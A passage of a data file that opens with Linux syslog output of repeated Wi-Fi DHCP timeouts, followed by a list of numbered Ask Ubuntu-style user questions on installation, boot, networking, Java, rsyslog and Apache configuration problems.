18:12:37 qwindoo dhclient : dhcprequest of 192.168.1.12 on wlan0 to 255.255.255.255 port 67 jul 29 18:12:47 dhclient : last message repeated 2 times jul 29 18:12:47 qwindoo kernel : [ 1798.016842 ] wlan0 : no ipv6 routers present jul 29 18:12:57 qwindoo dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 jul 29 18:13:00 qwindoo dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 5 jul 29 18:13:05 qwindoo dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 9 jul 29 18:13:14 qwindoo dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 14 jul 29 18:13:23 qwindoo networkmanager [ 923 ] : ( wlan0 ) : dhcpv4 request timed out . jul 29 18:13:23 qwindoo networkmanager [ 923 ] : ( wlan0 ) : canceled dhcp transaction , dhcp client pid 5199 jul 29 18:13:23 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... jul 29 18:13:23 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... jul 29 18:13:23 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] jul 29 18:13:23 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) failed for access point ( livebox-7435 ) jul 29 18:13:23 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) failed . jul 29 18:13:23 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . jul 29 18:13:23 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jul 29 18:13:23 qwindoo networkmanager [ 923 ] : ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] jul 29 18:13:23 qwindoo kernel : [ 1833.474562 ] wlan0 : deauthenticating from 5c:33:8e:8e:33:66 by local choice ( reason=3 ) jul 29 18:13:23 qwindoo wpa_supplicant [ 1261 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 jul 29 18:13:23 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : completed - > disconnected jul 29 18:13:23 qwindoo kernel : [ 1833.678195 ] cfg80211 : all devices are disconnected , going to restore regulatory settings jul 29 18:13:23 qwindoo kernel : [ 1833.678211 ] cfg80211 : restoring regulatory settings jul 29 18:13:23 qwindoo kernel : [ 1833.678222 ] cfg80211 : calling crda to update world regulatory domain jul 29 18:13:23 qwindoo kernel : [ 1833.688505 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain jul 29 18:13:23 qwindoo kernel : [ 1833.688518 ] cfg80211 : world regulatory domain updated : jul 29 18:13:23 qwindoo kernel : [ 1833.688524 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jul 29 18:13:23 qwindoo kernel : [ 1833.688533 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:13:23 qwindoo kernel : [ 1833.688542 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:13:23 qwindoo kernel : [ 1833.688550 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:13:23 qwindoo kernel : [ 1833.688558 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:13:23 qwindoo kernel : [ 1833.688565 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:13:26 qwindoo networkmanager [ 923 ] : auto-activating connection 'livebox-7435 ' . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) starting connection 'livebox-7435' jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0/wireless ) : access point 'livebox-7435 ' has security , but secrets are required . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0/wireless ) : connection 'livebox-7435 ' has security , and secrets exist . no new secrets needed . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : config : added 'ssid ' value 'livebox-7435' jul 29 18:13:26 qwindoo networkmanager [ 923 ] : config : added 'scan_ssid ' value '1' jul 29 18:13:26 qwindoo networkmanager [ 923 ] : config : added 'key_mgmt ' value 'wpa-psk' jul 29 18:13:26 qwindoo networkmanager [ 923 ] : config : added 'psk ' value '' jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : config : set interface ap_scan to 1 jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : disconnected - > scanning jul 29 18:13:26 qwindoo wpa_supplicant [ 1261 ] : trying to authenticate with 5c:33:8e:8e:33:66 ( ssid='livebox-7435 ' freq=2437 mhz ) jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : scanning - > authenticating jul 29 18:13:26 qwindoo kernel : [ 1836.800674 ] wlan0 : authenticate with 5c:33:8e:8e:33:66 ( try 1 ) jul 29 18:13:26 qwindoo wpa_supplicant [ 1261 ] : trying to associate with 5c:33:8e:8e:33:66 ( ssid='livebox-7435 ' freq=2437 mhz ) jul 29 18:13:26 qwindoo kernel : [ 1836.803209 ] wlan0 : authenticated jul 29 18:13:26 qwindoo kernel : [ 1836.803435 ] wlan0 : associate with 5c:33:8e:8e:33:66 ( try 1 ) jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : authenticating - > associating jul 29 18:13:26 qwindoo kernel : [ 1836.807446 ] wlan0 : rx reassocresp from 5c:33:8e:8e:33:66 ( capab=0x431 status=0 aid=2 ) jul 29 18:13:26 qwindoo kernel : [ 1836.807449 ] wlan0 : associated jul 29 18:13:26 qwindoo wpa_supplicant [ 1261 ] : associated with 5c:33:8e:8e:33:66 jul 29 18:13:26 qwindoo kernel : [ 1836.810872 ] cfg80211 : calling crda for country : fr jul 29 18:13:26 qwindoo kernel : [ 1836.814041 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814045 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814047 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814050 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814051 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814053 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814055 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814057 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814059 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814061 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814063 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814065 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814066 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814068 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814070 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814072 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814074 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814076 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814078 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814080 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814081 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814083 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814085 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814087 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814089 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with regulatory rule : jul 29 18:13:26 qwindoo kernel : [ 1836.814091 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814094 ] cfg80211 : regulatory domain changed to country : fr jul 29 18:13:26 qwindoo kernel : [ 1836.814095 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jul 29 18:13:26 qwindoo kernel : [ 1836.814097 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814099 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814101 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 29 18:13:26 qwindoo kernel : [ 1836.814103 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : associating - > associated jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : associated - > 4-way handshake jul 29 18:13:26 qwindoo wpa_supplicant [ 1261 ] : wpa : key negotiation completed with 5c:33:8e:8e:33:66 [ ptk=ccmp gtk=tkip ] jul 29 18:13:26 qwindoo wpa_supplicant [ 1261 ] : ctrl-event-connected - connection to 5c:33:8e:8e:33:66 completed ( reauth ) [ id=0 id_str= ] jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : 4-way handshake - > completed jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'livebox-7435 ' . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) jul 29 18:13:26 qwindoo networkmanager [ 923 ] : dhclient started with pid 5212 jul 29 18:13:26 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . jul 29 18:13:26 qwindoo dhclient : internet systems consortium dhcp client 4.1-esv-r4 jul 29 18:13:26 qwindoo dhclient : copyright 2004-2011 internet systems consortium . jul 29 18:13:26 qwindoo dhclient : all rights reserved . jul 29 18:13:26 qwindoo dhclient : for info , please visit https : //www.isc.org/software/dhcp/ jul 29 18:13:26 qwindoo dhclient : jul 29 18:13:26 qwindoo networkmanager [ 923 ] : ( wlan0 ) : dhcpv4 state changed nbi - > preinit jul 29 18:13:26 qwindoo dhclient : listening on lpf/wlan0/ac:72:89:45:2e : fa jul 29 18:13:26 qwindoo dhclient : sending on lpf/wlan0/ac:72:89:45:2e : fa jul 29 18:13:26 qwindoo dhclient : sending on socket/fallback jul 29 18:13:26 qwindoo dhclient : dhcprequest of 192.168.1.12 on wlan0 to 255.255.255.255 port 67 jul 29 18:13:36 dhclient : last message repeated 2 times jul 29 18:13:36 qwindoo kernel : [ 1846.899122 ] wlan0 : no ipv6 routers present jul 29 18:13:57 qwindoo dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 jul 29 18:14:00 qwindoo dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 jul 29 18:14:03 qwindoo dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 4 jul 29 18:14:07 qwindoo dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 11 jul 29 18:14:12 qwindoo networkmanager [ 923 ] : ( wlan0 ) : dhcpv4 request timed out . jul 29 18:14:12 qwindoo networkmanager [ 923 ] : ( wlan0 ) : canceled dhcp transaction , dhcp client pid 5212 jul 29 18:14:12 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... jul 29 18:14:12 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... jul 29 18:14:12 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] jul 29 18:14:12 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) failed for access point ( livebox-7435 ) jul 29 18:14:12 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) failed . jul 29 18:14:12 qwindoo networkmanager [ 923 ] : activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . jul 29 18:14:12 qwindoo networkmanager [ 923 ] : ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jul 29 18:14:12 qwindoo networkmanager [ 923 ] : ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] jul 29 18:14:12 qwindoo kernel : [ 1882.422940 ] wlan0 : deauthenticating from 5c:33:8e:8e:33:66 by local choice ( reason=3 ) jul 29 18:14:12 qwindoo wpa_supplicant [ 1261 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 jul 29 18:14:12 qwindoo kernel : [ 1882.552491 ] cfg80211 : all devices are disconnected , going to restore regulatory settings jul 29 18:14:12 qwindoo kernel : [ 1882.552506 ] cfg80211 : restoring regulatory settings jul 29 18:14:12 qwindoo kernel : [ 1882.552519 ] cfg80211 : calling crda to update world regulatory domain jul 29 18:14:12 qwindoo networkmanager [ 923 ] : ( wlan0 ) : supplicant interface state : completed - > disconnected jul 29 18:14:12 qwindoo kernel : [ 1882.561987 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain jul 29 18:14:12 qwindoo kernel : [ 1882.561997 ] cfg80211 : world regulatory domain updated : jul 29 18:14:12 qwindoo kernel : [ 1882.562001 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jul 29 18:14:12 qwindoo kernel : [ 1882.562008 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:14:12 qwindoo kernel : [ 1882.562014 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:14:12 qwindoo kernel : [ 1882.562019 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:14:12 qwindoo kernel : [ 1882.562024 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 29 18:14:12 qwindoo kernel : [ 1882.562029 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm )
326118	why wo n't supertux level editor compile on ubuntu 13.04 ?	i should have the latest files from supertux wiki . i 've compiled the game itself , but the editor has problems compiling . here 's the error i get : monocsharp lisp.dll make : gmcs : command not found make : *** [ lisp.dll ] error 127 i have monodevelop installed , but it still seems like i 'm missing some dependencies .
326119	unknown processes starting with jfs and xfs	today , i checked the running processes on my ubuntu 12.04 server . there are 9 processes named jfscommit , jfssync and jfsio . i wanted to ask what they are used for because i never saw them before and if/how i can remove them if needed . also there are some processes starting with xfs which i never had before . thank you ! output of df -t filesystem type 1k-blocks used available use % mounted on /dev/sda1 ext4 480719568 2315116 453985228 1 % / udev devtmpfs 1994316 4 1994312 1 % /dev tmpfs tmpfs 801252 288 800964 1 % /run none tmpfs 5120 0 5120 0 % /run/lock none tmpfs 2003128 0 2003128 0 % /run/shm
326121	missing operating system when restoring ubuntu partition with `dd` on macbook pro	i have a macbook pro ( 7,1 ) where i installed ubuntu successfully . i have now changed hard drive , and restored macosx successfully . i then went about restoring the ubuntu partition , and copied it across from the old disk with dd . unfortunately , refit does n't recognise it as an ubuntu partition any more , and if i boot into it anyway it says `` missing operating system '' . what can i do to restore my old ubuntu partition from the old hard drive to the new one ? am i missing any steps ?
326133	how to get home directory on second hard drive ?	looked through a bunch of answers on this site but could n't figure out how to keep ubuntu on my primary hard drive while directing my home folder to a second . my drives are : ssd = windows/ubuntu hdd = music , videos , pictures , documents , desktop , downloads how can i go into my home folder , open one of the folders like documents , and have it access that second drive respectively ? i tried to follow this move home folder to second drive but i do n't know how to follow the `` system- > administration- > users & groups ''
326134	ubuntu video issue when booting	i 'm trying to help my friend out . has anyone encountered the following with ubuntu 12.04.2 lts upon booting :
326139	copy files from one folder and paste them to another location under same folder name	please , i need help with backup ... i am trying to do something and i have no idea how to start . i want to make a script in ubuntu that would search through all folders of my w7 partition , and wherever there are .cdr files it would ( select and ) copy all files from that folder ( .jpg , .png , .pdf , ... ) but not other folders in that folder . then it would paste those files onto my external drive in folder named exactly as the one those files were copied from . i know it 's complicated , and my english is not very good . i hope you can understand what i am struggling with and help me . any help or even advice is very much appreciated . thank you !
326141	computer goes directly to windows after installing ubuntu	last night i installed ubuntu using the online windows installer wubi.exe , my hard disk has 3 partitions , disk c : with windows os , disk d : where ubuntu was installed and disk e : everything went smooth and when finished , the computer was rebooted , but afterwards , every boot it goes directly to windows . what do i have to do to get to the screen that shows the os options so i can choose ubuntu ?
326142	how to fix display issue where random characters are missing ?	just installed ubuntu and this is my screen i uninstalled and reinstalled several times
326143	sudo apt-get -f install	i want to run the following command : sudo apt-get -f install all packages downloads fine expect 1 package because the contain `` proxy '' word in the link and my isp block it i can give him another link to download package from or i can use some vpn programs like vidalia but i ca n't install anything ! ! so how can i specify a link or install a software
326144	installing ubuntu for android	few questions : can i install ubuntu alongside with android ? can i install it on sony xperia u ? in my country , someone sell fake chinese smartphones . galaxy s3 look-alike costs 25 $ . so if i bought this crap can i install on it ? or i ca n't i need original one ? also the cpu , ram , gpu are same , not replaced but fake and bad .
326147	install error : ca n't select and install software , install grub or lilo boot loader	i 'm installing ubuntu from live cd on a compaq presario 1500 . the text installer spits out an error on `` select and install software '' and similarly when i manually select later steps from the menu . after selecting finish the installation and rebooting , i get a black screen with blinking cursor . the bios menu does n't seem to have any grub options to change . i found http : //www.linuxquestions.org/questions/ubuntu-63/please-help-ubuntu-alternate-install-459705/ but ca n't run fdisk or boot rescue from cd . it thinks synaptic or update manager is occupying a process . thanks for your help .
326152	installing java problem	i want to install java so that i can use the android sdk using the software centre i installed 'ubuntu restricted extras ' ( as it says that it includes java ) . the software centre looks like this has been successful . in the terminal if i type : java -version it comes back with ... . the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless try : sudo apt-get install < selected package > q1 ) does this mean java is not installed ? q2 ) is there a better way to report which type and version of java is installed q3 ) if it is not installed then what could have gone wrong with the installations of 'extras' q4 ) is there a simple way of installing the latest java runtime ? i.e . without having to know what the latest verion of java is and without downloading and unzipping and running scripts but just using the standard add-apt-repository + apt-get install . thanks
326155	append any line that starts with < br > with the previous line in whole document	i wan na remove spaces and join line that starts with specific words at the last of previous line . example from ` < b > any thing that matters < b > what ever , i do n't know . < font=any type > what ever you do is not right < font > < br > this line will go to the end of above line < hi > not this one < hi > < br > but this one < go > i hope you understand < go > ` to ` < b > any thing that matters < b > what ever , i do n't know . < font=any type > what ever you do is not right < font > < br > this line will go to the end of above line < hi > not this one < hi > < br > but this one < go > i hope you understand < go > ` i wan na do it with the help of commands as the files amount is huge . thanks .
326156	how to customize unattended-upgrades notification emails ?	is there any way to customize the unattended-upgrades results mail in ubuntu ? the current configuration in /etc/apt/apt.conf.d/50unattended-upgrades file - // send email to this address for problems or packages upgrades // if empty or unset then no email is sent , make sure that you // have a working mail setup on your system . the package 'mailx' // must be installed or anything that provides /usr/bin/mail . //unattended-upgrade : :mail `` root @ localhost '' ; sends an email on every run . instead , i would like to customize it to send only on error . is there any way i can configure that ?
326160	run a python script on login with sudo	i am setting up a machine that 's sole purpose is to run a specific python application that uses a curses ui . that being said , there are some aspects of the application that require it to be run as su . how can i run this application on login so the user does n't need to execute it every time ? i have seen is there a script that runs as root when user logs in ? and it seems different than mine as they do n't actually require su there . i really do n't care about security at all for this application , it 's not online nor will it ever be online . i do n't even care if i have to enter my credentials twice either . i just want it to execute the line : sudo python ~/application/main.py on login . if there 's a more efficient way where i do n't have to enter credentials twice , that would be even better . this has to work on ubuntu server as well .
326167	problem in launching topcoder arena	i am trying to access topcoder arena but facing a problem . i am following the procedure given in the following link - http : //community.topcoder.com/tc ? module=static & d1=help & d2=getstarted i am using ubuntu 13.04 . currently openjdk-7-jdk is installed on my computer . on running `` contestappletprod.jnlp '' file , a pop-up from firefox is asking me to download the file again and again . any solutions ?
326172	overriding default syslog behavior	with ubuntu 12.04 , file /etc/rsyslog.d/50-default.conf containes following line /etc/rsyslog.d/50-default.conf : * . * ; auth , authpriv.none -/var/log/syslog now i have my own rsyslog conf : /etc/rsyslog.d/90-my.conf : local0 . * /var/log/my.log however , when write to `` local0 '' facility from my application , logs lines go to both var/log/syslog and /var/log/my.log how can i stop it to write to /var/log/syslog ? ?
326175	how to delete windows ? i only want ubuntu	how can i delete windows ? i only want ubuntu on my pc . i dont want windows . it came together with windows when i am downloading ubuntu but i dont want windows . is there any way to delete windows 7 ? i am using ubuntu 13.04 please help me . please explaing me how to delete that windows 7 i tried to reinstall my ubuntu but my windows 7 still exist . i cant delete that windows 7 . please explain how to delete that os . i only want ubuntu on my pc because ubuntu is best os ever in this planet !
326179	install ubuntu on 128gb ssd or 3tb sata disk ?	sorry for the silly question ; for gaming/heavy programs on ubuntu ( playonlinux , wine , steam etc . ) and given the amount up updates that come and go plus , i am - at least under the impression that you can not chose where programs are installed as much as you would be able to on windows ( with wizard installations ) am i wrong ? so with that in mind where would you suggest i install ubuntu and why ? edit ( more background ) : i ask because i have previously had issues with /boot being full from several kernels + initrd ( i fixed this ) and also because already on this machine my ssd is at 60 % use according to df -h and i am not that experienced yet with gnu/linux so i though i would ask here .
326180	screen sharing behind firewall	i 've setup my brother 's computer with ubuntu . i would like to be able to control his screen with his permission , to configure and instruct him when needed . however , he is on a provide ip provided by his router or will be at a coffee shop . is there an easy way for him to allow me to access his computer without having to configure a router ? thank you .
326181	apache alias folder : 403 access forbidden	ok , i have set up an alias on my apache server to point to a directory on a second hd . the directory is /media/mediaserver/videos . the point of all this , is to stream videos from that folder , to my tv using roku , and roksbox . everything worked fine when i kept my video files in my www folder ... but i was running low on hd space.. took me a while to get the damn thing to even look in the right place . now it looks to the right folder ... but gives me the 403 access forbidden error . i am a bit of a noob at this stuff ... so forgive me for lack on info . if i do not include something you need to see in order to help me , just let me know . first : after following countless tutorials on how to set up the alias ... the only one that worked ... was this : http : //www.youtube.com/watch ? v=fier_jz1oya finally , after following that , i have the following .conf file : alias /videos/ /media/mediaserver/videos options +indexes followsymlinks +execcgi allowoverride authconfig fileinfo order allow , deny allow from all now , when i type in localhost/videos in my browser , it actually looks at the videos folder ( at least it appears too , compared to before when the best i could do was get it to tell me that www/videos did not exist ... ) but it tells me `` you do n't have permission to access /videos/ on this server . '' i have tried changing the permissions on the videos directory to 777 , 775 , 750 , etc ... nothing seems to work . even tried to change the permissions to the /media directory ( found a few forum topics that suggested that the parent directories needed full permissions as well . ) nothing seems to work . help ! please ! *update* i opened a terminal and logged in as www-data ( which is what the apache server uses ) and am able to access the videos folder ... so ... unless i am completely off here ... that means it 's not a permissions issue ... *update* *solved* ok ... not sure why this worked ... but here 's what i did that works.. i went back into the alias conf file ... and instead of pointing to /media/mediaserver/videos , i pointed to /media/mediaserver now , all of a sudden , when i try to access localhost/videos ( which is no longer what should work ... ) it works ... perfectly ... not sure what is going on ... ut it works ... and that is all that matters .
326184	problem reinstalling . original install was done while connected to a tv	i had an old desktop running win xp connected to my samsung led tv with a vga cable . it worked fine . i installed ubuntu 12.04 . the install went fine . i could see everything fine on the tv screen . at the end of the install it does a reboot . it then came back and said it could not configure itself to the tv screen . i decided to connect a regular monitor to the computer and do a reinstall . i turned off the computer , put the 12.04 install dvd in the dvd drive , connected the monitor , and turned the computer back on . it goes into terminal mode . it asks for my login and password , then it is at the terminal prompt . where do i go from here ?
326185	full changelog of updated packages for ubuntu releases ?	so for any given version e.g . 12.04 , 12.10 , 13.04 , etc . a full changelog of all update packages e.g . mysql , apache , etc. ? note : raring ringtail release notes says : for a list of all packages being accepted for 13.04 raring ringtail , please subscribe to raring-changes . the raring changes is a mailing list of nightmare proportions . maybe there 's a final , proofed , easy to understand , changelog of all updated packages ?
326188	can i install ubuntu using ubuntu 13.04 live cd on ubuntu 12.10 ?	and , will may my applications be as is ? am i going to have any compatibilty issues with applications ? is it possible even using a live cd to install the newest version of ubuntu over the existing one .
